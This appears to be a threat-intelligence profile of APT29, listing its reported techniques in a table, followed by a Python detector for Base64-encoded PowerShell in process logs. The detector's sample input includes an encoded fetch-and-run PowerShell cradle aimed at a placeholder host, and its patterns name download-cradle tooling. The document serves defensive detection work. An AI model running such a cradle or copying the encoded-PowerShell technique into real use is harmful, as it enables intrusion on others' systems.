APT29 is a threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)
Platform | Tactic | Technique | Description | Data Sources |
---|---|---|---|---|
Linux, macOS, Windows | defense-evasion | Indicator Removal on Host | APT29 used SDelete to remove artifacts from victims. | File monitoring, Process monitoring, Process command-line parameters, API monitoring, Windows event logs |
Windows | persistence | Shortcut Modification | APT29 drops a Windows shortcut file for execution. | File monitoring, Process monitoring, Process command-line parameters |
Linux, macOS, Windows | defense-evasion | Obfuscated Files or Information | APT29 has used Base64-encoded PowerShell for obfuscation. | Network protocol analysis, Process use of network, File monitoring, Malware reverse engineering, Binary file metadata, Process command-line parameters, Environment variable, Process monitoring, Windows event logs, Network intrusion detection system, Email gateway, SSL/TLS inspection |
Windows | defense-evasion, execution | Rundll32 | APT29 has used rundll32.exe for execution. | File monitoring, Process monitoring, Process command-line parameters, Binary file metadata |
Linux, macOS, Windows | command-and-control | Commonly Used Port | APT29 has used port 443 for C2. | Packet capture, Netflow/Enclave netflow, Process use of network, Process monitoring |
Windows, Linux, macOS | command-and-control | Standard Non-Application Layer Protocol | APT29 uses TCP for C2 communications. | Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network |
Linux, Windows, macOS | execution | User Execution | APT29 has used various forms of spearphishing attempting to get a user to open links or attachments, including, but not limited to, malicious Microsoft Word documents, .pdf, and .lnk files. | Anti-virus, Process command-line parameters, Process monitoring |
Linux, Windows, macOS | execution | Exploitation for Client Execution | APT29 has used multiple software exploits for common client software, like Microsoft Word and Adobe Reader, to gain code execution as part of. | Anti-virus, System calls, Process monitoring |
Windows, macOS, Linux | initial-access | Spearphishing Attachment | APT29 has used spearphishing emails with an attachment to deliver files with exploits to initial victims. | File monitoring, Packet capture, Network intrusion detection system, Detonation chamber, Email gateway, Mail server |
Windows, macOS, Linux, Office 365, SaaS | initial-access | Spearphishing Link | APT29 has used spearphishing emails containing a link to trick victims into clicking through to a zip file containing malicious files. | Packet capture, Web proxy, Email gateway, Detonation chamber, SSL/TLS inspection, DNS records, Mail server |
Linux, macOS, Windows | command-and-control | Domain Fronting | APT29 has used the meek domain fronting plugin for Tor to hide the destination of C2 traffic. | SSL/TLS inspection, Packet capture |
Linux, macOS, Windows | command-and-control | Multi-hop Proxy | A backdoor used by APT29 created a Tor hidden service to forward traffic from the Tor client to local ports 3389 (RDP), 139 (NetBIOS), and 445 (SMB), enabling full remote access from outside the network. | Network protocol analysis, Netflow/Enclave netflow |
Windows | defense-evasion, privilege-escalation | Bypass User Account Control | APT29 has bypassed UAC. | System calls, Process monitoring, Authentication logs, Process command-line parameters |
Windows | persistence, privilege-escalation | Accessibility Features | APT29 used Sticky Keys to obtain unauthenticated, privileged console access. | Windows Registry, File monitoring, Process monitoring |
Windows | persistence | Registry Run Keys / Startup Folder | APT29 added Registry Run keys to establish persistence. | Windows Registry, File monitoring |
Windows | lateral-movement | Pass the Ticket | APT29 used Kerberos ticket attacks for lateral movement. | Authentication logs |
Windows, macOS | defense-evasion | Software Packing | APT29 used UPX to pack files. | Binary file metadata |
Windows | persistence | Windows Management Instrumentation Event Subscription | APT29 has used WMI event filters to establish persistence. | WMI Objects |
Windows | execution | Windows Management Instrumentation | APT29 used WMI to steal credentials and execute backdoors at a future time. | Authentication logs, Netflow/Enclave netflow, Process monitoring, Process command-line parameters |
Windows | execution, persistence, privilege-escalation | Scheduled Task | APT29 used named and hijacked scheduled tasks to establish persistence. | File monitoring, Process monitoring, Process command-line parameters, Windows event logs |
Linux, macOS, Windows | defense-evasion, execution | Scripting | APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke, as well as to evade defenses. | Process monitoring, File monitoring, Process command-line parameters |
Windows | execution | PowerShell | APT29 has used encoded PowerShell scripts uploaded to CozyCar installations to download and install SeaDuke. APT29 also used PowerShell scripts to evade defenses. | PowerShell logs, Loaded DLLs, DLL monitoring, Windows Registry, File monitoring, Process monitoring, Process command-line parameters |
Linux, macOS, Windows | defense-evasion | File Deletion | APT29 used SDelete to remove artifacts from victims. | File monitoring, Process command-line parameters, Binary file metadata |
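The Obfuscated Files or Information, Scripting and PowerShell rows above all point at process command-line parameters and PowerShell logs as the data sources for Base64-encoded PowerShell. As an added example (not part of this page and not APT29 tooling), the following Python decodes `-EncodedCommand` payloads from command-line log entries and flags decoded scripts that contain a download cradle or run with a hidden window; the sample command lines are constructed for the example, not real telemetry.

```python
import base64
import re

def encode_ps(script: str) -> str:
    """Build the UTF-16LE Base64 form that powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")

# Constructed sample process command lines (not real telemetry): two encoded,
# one plain script launch, one unrelated process.
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -Enc "
    + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"),
    "powershell.exe -EncodedCommand " + encode_ps("Get-Process | Out-File C:\\temp\\procs.txt"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "notepad.exe C:\\notes.txt",
]

# powershell.exe accepts abbreviated switch names, so match the common prefixes of
# -EncodedCommand; "-e" must be followed by whitespace so -ExecutionPolicy is not matched.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
HIDDEN_WINDOW = re.compile(r"(?i)-w(?:indowstyle)?\s+hidden")
INVOKE_EXPR = re.compile(r"(?i)\bIEX\b|Invoke-Expression")
DOWNLOAD_CRADLE = re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient")

def decode_encoded_command(cmdline: str):
    """Return the decoded script if cmdline carries a valid -EncodedCommand payload, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(2), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None

def analyze(cmdline: str) -> dict:
    """Classify one command line; 'reasons' lists every indicator that fired."""
    script = decode_encoded_command(cmdline)
    if script is None:
        return {"encoded": False, "script": None, "reasons": []}
    reasons = ["encoded PowerShell command line"]
    if INVOKE_EXPR.search(script):
        reasons.append("Invoke-Expression in decoded script")
    if DOWNLOAD_CRADLE.search(script):
        reasons.append("download cradle in decoded script")
    if HIDDEN_WINDOW.search(cmdline):
        reasons.append("hidden window")
    return {"encoded": True, "script": script, "reasons": reasons}

def scan(cmdlines):
    """Analyze a batch of command lines and return only the encoded ones."""
    return [(c, analyze(c)) for c in cmdlines if analyze(c)["encoded"]]
```

Encoded use on its own is not malicious (the second sample decodes to a harmless inventory command), so the decoded script, not the mere presence of the switch, is what an alert should be built on.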